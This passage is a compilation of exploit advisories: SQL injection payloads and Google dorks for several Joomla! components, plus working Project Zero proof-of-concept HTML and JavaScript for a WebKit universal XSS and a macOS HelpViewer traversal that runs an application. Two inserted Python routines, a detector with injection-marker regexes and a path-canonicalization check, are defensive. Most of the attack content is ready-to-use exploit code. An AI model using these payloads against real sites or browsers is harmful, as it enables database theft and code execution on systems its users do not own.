# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php?option=com_userextranet&view=folders&fid=[SQL]
# 66+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# # # # #
# # # # #
# Exploit Title: Joomla! Component AJAX Search for K2 v2.2 - SQL Injection
# Google Dork: inurl:index.php?option=com_k2ajaxsearch
# Date: 24.02.2017
# Vendor Homepage: http://taleia.software/
# Software Buy: https://extensions.joomla.org/extensions/extension/extension-specific/k2-extensions/ajax-search-for-k2/
# Demo: http://k2ajaxsearch.taleia.software/demo/
# Version: 2.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&=[SQL]
# http://localhost/[PATH]/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&module_id=101&efields[][]=[SQL]
# http://localhost/[PATH]/?searchword=Ihsan_Sencan&option=com_k2ajaxsearch&module_id=[SQL]&efields[][]=Ihsan_Sencan
# # # # #
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1049
When the new page is loading, FrameLoader::clear is called to clear the old document and window.
Here's a snippet of FrameLoader::clear.
void FrameLoader::clear(Document* newDocument, bool clearWindowProperties, bool clearScriptObjects, bool clearFrameView)
{
    ...
    // Do this after detaching the document so that the unload event works.
    if (clearWindowProperties) {
        InspectorInstrumentation::frameWindowDiscarded(m_frame, m_frame.document()->domWindow());
        m_frame.document()->domWindow()->resetUnlessSuspendedForDocumentSuspension();
        m_frame.script().clearWindowShell(newDocument->domWindow(), m_frame.document()->pageCacheState() == Document::AboutToEnterPageCache); <<-------- (1)
        if (shouldClearWindowName(m_frame, *newDocument))
            m_frame.tree().setName(nullAtom);
    }
    ...
    m_frame.setDocument(nullptr); <<-------- (2)
    ...
}
The new document's window is attached at (1) before the call to |m_frame.setDocument(nullptr)| at (2), which runs the unload event handlers. So in an unload event handler we can execute arbitrary JavaScript code on the new document's window with a javascript: URI.
Tested on Safari 10.0.2(12602.3.12.0.1).
-->
<body>
<script>
/*
Apple WebKit: UXSS via FrameLoader::clear
When the new page is loading, FrameLoader::clear is called to clear the old document and window.
Here's a snippet of FrameLoader::clear.
void FrameLoader::clear(Document* newDocument, bool clearWindowProperties, bool clearScriptObjects, bool clearFrameView)
{
    ...
    // Do this after detaching the document so that the unload event works.
    if (clearWindowProperties) {
        InspectorInstrumentation::frameWindowDiscarded(m_frame, m_frame.document()->domWindow());
        m_frame.document()->domWindow()->resetUnlessSuspendedForDocumentSuspension();
        m_frame.script().clearWindowShell(newDocument->domWindow(), m_frame.document()->pageCacheState() == Document::AboutToEnterPageCache); <<-------- (1)
        if (shouldClearWindowName(m_frame, *newDocument))
            m_frame.tree().setName(nullAtom);
    }
    ...
    m_frame.setDocument(nullptr); <<-------- (2)
    ...
}
The new document's window is attached at (1) before the call to |m_frame.setDocument(nullptr)| at (2), which runs the unload event handlers. So in an unload event handler we can execute arbitrary JavaScript code on the new document's window with a javascript: URI.
Tested on Safari 10.0.2(12602.3.12.0.1).
*/
"use strict";
function log(txt) {
    //if (Array.isArray(txt))
    //    txt = Array.prototype.join.call(txt, ", ");
    let c = document.createElement("div");
    c.innerText = "log: " + txt;
    d.appendChild(c);
}
function main() {
    let f = document.body.appendChild(document.createElement("iframe"));
    let a = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
    a.contentWindow.onunload = () => {
        let b = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
        b.contentWindow.onunload = () => {
            f.src = "javascript:''";
            let c = f.contentDocument.documentElement.appendChild(document.createElement("iframe"));
            c.contentWindow.onunload = () => {
                f.src = "javascript:''";
                let d = f.contentDocument.appendChild(document.createElement("iframe"));
                d.contentWindow.onunload = () => {
                    f.src = "javascript:setTimeout(eval(atob('" + btoa("(" + function () {
                        alert(document.location);
                    } + ")") + "')), 0);";
                };
            };
        };
    };
    f.src = "https://abc.xyz/";
}
main();
/*
b JSC::globalFuncParseFloat
*/
</script>
</body>
# # # # #
# Exploit Title: Joomla! Component Community Polls v4.5.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_communitypolls
# Date: 24.02.2017
# Vendor Homepage: http://corejoomla.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/polls/community-polls/
# Demo: http://demo.corejoomla.com/polls.html
# Version: 4.5.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# index.php?option=com_communitypolls&view=search
# http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_keywords=1&filter_order=a.catid&filter_order_Dir=desc&catid[]=[SQL]
# 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
# # # # #
# # # # #
# Exploit Title: Joomla! Component Community Surveys v4.3 - SQL Injection
# Google Dork: inurl:index.php?option=com_communitysurveys
# Date: 24.02.2017
# Vendor Homepage: http://corejoomla.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/surveys/community-surveys/
# Demo: http://demo.corejoomla.com/surveys.html
# Version: 4.3
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# index.php?option=com_communitysurveys&view=search
# http://localhost/[PATH]/?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_keywords=1&filter_order=a.catid&filter_order_Dir=desc&catid[]=[SQL]
# 66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
# # # # #
# # # # #
# Exploit Title: Joomla! Component JooDatabase v3.1.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_joodb
# Date: 24.02.2017
# Vendor Homepage: https://feenders.de/
# Software Buy: https://extensions.joomla.org/extensions/extension/core-enhancements/coding-a-scripts-integration/joodatabase/
# Demo: https://joodb.feenders.de/db-example.html
# Version: 3.1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_joodb&view=catalog&format=html&reset=false&Itemid=321&task=&search=[SQL]&searchfield=Ihsan_Sencan
# http://localhost/[PATH]/index.php?option=com_joodb&view=catalog&format=html&reset=false&Itemid=321&task=&search=Ihsan_Sencan&searchfield=[SQL]
# # # # #
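An added detection routine (example code, not from any of the advisories) that normalizes query parameters the way MySQL will eventually see them and flags the UNION, export_set(), error-based and PROCEDURE ANALYSE techniques used across the Joomla! component advisories above. The request lines are constructed from those advisories' URLs, plus one double-encoded variant and one benign search; it goes beyond the page by handling the double-encoded case.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# /*!50000union*/ is a MySQL version comment: the server executes what is inside it.
VERSION_COMMENT_RE = re.compile(r"/\*!\d*\s*(.*?)\*/", re.S)
MARKERS = {
    "union-select": re.compile(r"\bunion\b[\s\S]{0,40}?\bselect\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "export_set": re.compile(r"\bexport_set\s*\(", re.I),
    "xpath-error": re.compile(r"\b(?:extractvalue|updatexml)\s*\(", re.I),
    "dup-key-error": re.compile(r"\bfloor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "procedure-analyse": re.compile(r"\bprocedure\s+analyse\b", re.I),
}

# Constructed access-log request lines built from the advisories' URLs (payload
# spaces written as '+', as a client would send them), one double-encoded variant
# and one benign search that contains "union" only inside a word.
SAMPLE_REQUESTS = [
    "GET /index.php/component/multitier/?mtpage=takecodel&tid=1&lid=-66'+/*!50000union*/+select+1,0x496873616e2053656e63616e,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8+--+- HTTP/1.1",
    "GET /index.php?option=com_userextranet&view=folders&fid=66+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)--+- HTTP/1.1",
    "GET /?list_filter=Ihsan_Sencan&list_filter_field=author&filter_all_keywords=1&filter_order=a.catid&filter_order_Dir=desc&catid[]=66+AND(SELECT+1+from(SELECT+COUNT(*),CONCAT((SELECT+(SELECT+(SELECT+DISTINCT+CONCAT(0x496873616e2053656e63616e,0x7e,0x27,CAST(schema_name+AS+CHAR),0x27,0x7e)+FROM+INFORMATION_SCHEMA.SCHEMATA+WHERE+table_schema!=DATABASE()+LIMIT+1,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),+FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1 HTTP/1.1",
    "GET /index.php?option=com_joodb&view=catalog&search=1%2527%2520union%2520select%25201%252c2%252c3&searchfield=title HTTP/1.1",
    "GET /?searchword=reunion+party&option=com_k2ajaxsearch&module_id=101 HTTP/1.1",
]


def normalize(value):
    """Second decoding pass (parse_qsl already did one, so this catches double
    encoding), unwrap version comments and collapse whitespace."""
    text = unquote_plus(value)
    text = VERSION_COMMENT_RE.sub(r"\1", text)
    return re.sub(r"\s+", " ", text)


def inspect_request(request_line):
    """Return {param: [marker, ...]} for every query parameter that carries
    injection markers; an empty dict means the request looks clean."""
    target = request_line.split(" ")[1] if request_line.startswith(("GET ", "POST ")) else request_line
    hits = {}
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        text = normalize(raw)
        found = [label for label, rx in MARKERS.items() if rx.search(text)]
        if found:
            hits[name] = found
    return hits


def scan_log(request_lines):
    """Index every request line that shows at least one marker."""
    flagged = []
    for i, line in enumerate(request_lines):
        hits = inspect_request(line)
        if hits:
            flagged.append((i, hits))
    return flagged
```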
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1040
HelpViewer is an application that uses WebView to show a help file.
You can see it simply by the command:
open /Applications/Safari.app/Contents/Resources/Safari.help
or using "help:" scheme:
help:openbook=com.apple.safari.help
help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html
HelpViewer's WebView has an internal protocol handler, "x-help-script", that can be used to open an arbitrary local file. Therefore, if we can run arbitrary JavaScript code, we'll win easily and, of course, we can also read an arbitrary local file with an XMLHttpRequest.
HelpViewer checks whether the URL's path lies inside a valid help file, but this check can be bypassed with a double-encoded "../".
PoC:
document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)";
The attached poc will pop up a Calculator.
Tested on macOS Sierra 10.12.1 (16B2659).
-->
<script>
/*
OSX: HelpViewer XSS leads to arbitrary file execution and arbitrary file read.
HelpViewer is an application that uses WebView to show a help file.
You can see it simply by the command:
open /Applications/Safari.app/Contents/Resources/Safari.help
or using "help:" scheme:
help:openbook=com.apple.safari.help
help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html
HelpViewer's WebView has an internal protocol handler, "x-help-script", that can be used to open an arbitrary local file. Therefore, if we can run arbitrary JavaScript code, we'll win easily and, of course, we can also read an arbitrary local file with an XMLHttpRequest.
HelpViewer checks whether the URL's path lies inside a valid help file, but this check can be bypassed with a double-encoded "../".
PoC:
document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)";
The attached poc will pop up a Calculator.
Tested on macOS Sierra 10.12.1 (16B2659).
*/
function main() {
    function second() {
        var f = document.createElement("iframe");
        f.onload = () => {
            f.contentDocument.location = "x-help-script://com.apple.machelp/scpt/OpnApp.scpt?:Applications:Calculator.app";
        };
        f.src = "help:openbook=com.apple.safari.help";
        document.documentElement.appendChild(f);
    }
    var url = "javascript%253aeval(atob('" + btoa(second.toString()) + "'));\nsecond();";
    document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=" + url;
}
main();
main();
</script>
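An added path check (example code, not Apple's) showing the canonicalization order the HelpViewer report describes as missing: percent-decode to a fixed point first, then normalize and test containment, and apply the same rule to the redirect parameter so a javascript: target is refused. HELP_ROOT is the bundle path taken from the report; the check functions are hypothetical names.

```python
import posixpath
from urllib.parse import parse_qs, unquote, urlsplit

HELP_ROOT = "/Applications/Safari.app/Contents/Resources/Safari.help"  # from the report


def fully_decode(text, max_rounds=5):
    """Percent-decode until the string stops changing, so "%25252f" and "%2f"
    both become "/" before any path check runs."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            return text
        text = decoded
    raise ValueError("percent-encoding nested deeper than %d levels" % max_rounds)


def resolve_help_path(url, root=HELP_ROOT):
    """Canonical path a help: URL refers to, or None when it is not a help: URL
    or escapes `root`. Decoding happens before normalization, which is the
    order a single-decode check gets wrong."""
    parts = urlsplit(url)
    if parts.scheme != "help":
        return None
    canonical = posixpath.normpath(fully_decode(parts.path))
    if canonical != root and not canonical.startswith(root + "/"):
        return None
    return canonical


def is_safe_redirect(raw_value, root=HELP_ROOT):
    """Accept a ?redirect= value only if, fully decoded, it carries no URL scheme
    (which rejects javascript:) and resolves inside the help bundle."""
    target = fully_decode(raw_value)
    if urlsplit(target).scheme:
        return False
    joined = posixpath.normpath(posixpath.join(root, target))
    return joined == root or joined.startswith(root + "/")


def check_help_url(url):
    """Both checks for one help: URL; returns (resolved path or None, redirects_ok)."""
    path = resolve_help_path(url)
    redirects = parse_qs(urlsplit(url).query).get("redirect", [])
    return path, all(is_safe_redirect(r) for r in redirects)
```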